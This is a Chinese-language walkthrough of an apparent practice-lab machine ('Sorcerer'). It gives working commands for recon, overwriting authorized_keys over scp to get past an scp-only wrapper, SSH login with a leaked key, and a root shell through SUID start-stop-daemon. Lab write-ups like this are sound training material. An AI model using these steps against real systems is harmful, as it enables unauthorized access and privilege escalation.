Recon

打靶機的起手式就是看看有甚麼服務是開啟的
PS. 這邊所使用的列舉程式來自 https://github.com/21y4d/nmapAutomator ，這個腳本可以幫我們自動用不同的工具做資訊蒐集與掃描

sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.214.100 -type script;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.214.100 -type full;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.214.100 -type udp;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.214.100 -type recon; 

Port 7742 上面有一個網站在跑，用 FFUF 做個路徑爆破吧

從 FFUF 的結果可以找到 zipfiles 的路徑，裡面有很多 zip 檔案，全部下載下來瞧瞧

Initial Access

在 Max 的檔案裡面找到他的 id_rsa 還有 authorized keys ，用來登入看看

ssh -i id_rsa max@$tIP

好吧，Max 登入失敗

看 authorized_keys 的文件，他看起來會把我們導入到一支叫做 scp_wrapper.sh的 腳本

由 scp_wrapper.sh 中看起來，只有 scp 過的了關，其他都會得到 ACCESS DENIED 的結果

scp 是可以讓我們傳東西到遠端的指令，也許這台把機是希望我們覆蓋 authorized_keys 這樣我們才能 ssh 登入

因為我們知道 max 是一個有效的使用者，而且我們有他的 id_rsa
所以最好的是用 max 的身分去上傳我們任何我們想要的東西
這邊我們希望可以改變 authorized_keys 的內容，通常這裏面放的是公鑰
所以現在我們要先產生一組公私鑰

ssh-keygen -f max

接著用 Max 的身分上傳我們新產的公鑰到 Max 的 ssh 下面，並且寫入 authorized_keys
這樣我們就能用新產的私鑰登入
這邊我們使用舊的 SCP protocol 去傳檔案

scp -i /home/kali/2_PG_PRACTICE/Sorcerer/home/max/.ssh/id_rsa  -O /home/kali/2_PG_PRACTICE/Sorcerer/home/max/kali_ssh/max.pub max@$tIP:/home/max/.ssh/authorized_keys

現在可以使用新產的私鑰登入主機了

ssh -i max max@$tIP

登入後，我們在 Dennis 目錄下面找到第一把 flag

Privilege Escalation

按照慣例我們用 Linpeas 收集提權資訊
在 SUID 的區塊中，有一個 start-stop-daemon 被標黃底

接著我們去 GTFObin 找看看有沒有相關的指令 https://gtfobins.github.io/gtfobins/start-stop-daemon/#suid
打進指令後順利提權! 收工囉~

/usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p